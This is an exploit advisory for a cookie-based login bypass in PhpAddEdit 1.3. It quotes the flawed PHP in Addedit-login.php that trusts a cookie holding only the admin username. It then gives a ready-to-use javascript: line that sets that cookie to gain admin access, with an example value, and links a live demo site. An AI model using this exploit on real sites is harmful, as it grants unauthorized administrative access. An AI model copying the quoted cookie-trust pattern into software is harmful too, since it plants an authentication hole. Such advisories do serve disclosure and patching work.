id: 4413
date: 12/11/2008
title: PhpAddEdit 1.3 (Cookie) Login Bypass Vulnerability
author: x0r
cves: 

==================================================
PhpAddEdit 1.3 (Cookie) Login Bypass Vulnerability
==================================================


-------------------------------------
   PhpAddEdit 1.3 Login By Pass 
-------------------------------------

Found By: x0r ( Evolution Team )
-------------------------------------

Bug In: Addedit-login.php

		if (!$login_error) {
			// --- Set admin cookie so favorite form field will show up when I use
the site...
			if ($_POST["rememberme"]) {
				$expire = mktime(0,0,0,date("m"),date("d")+120,date("Y"));
				setcookie("addedit", $_POST["adminuser"], $expire, "/", "", 0);
			} else {
				setcookie("addedit", $_POST["adminuser"]);
			}
			Header("Location:  ./");
		}
	}
	
Ci basta conoscere l'username dell'admin per bypassare il login :P ^ ^
-------------------------------------

Exploit:

javascript:document.cookie = "addedit=[adminuser]; path=/";

es:

javascript:document.cookie = "addedit=x0r; path=/";
--------------------------------------
Live Demo: http://www.phpaddedit.com/demo/
--------------------------------------



#  0day.today [2023-03-25]  #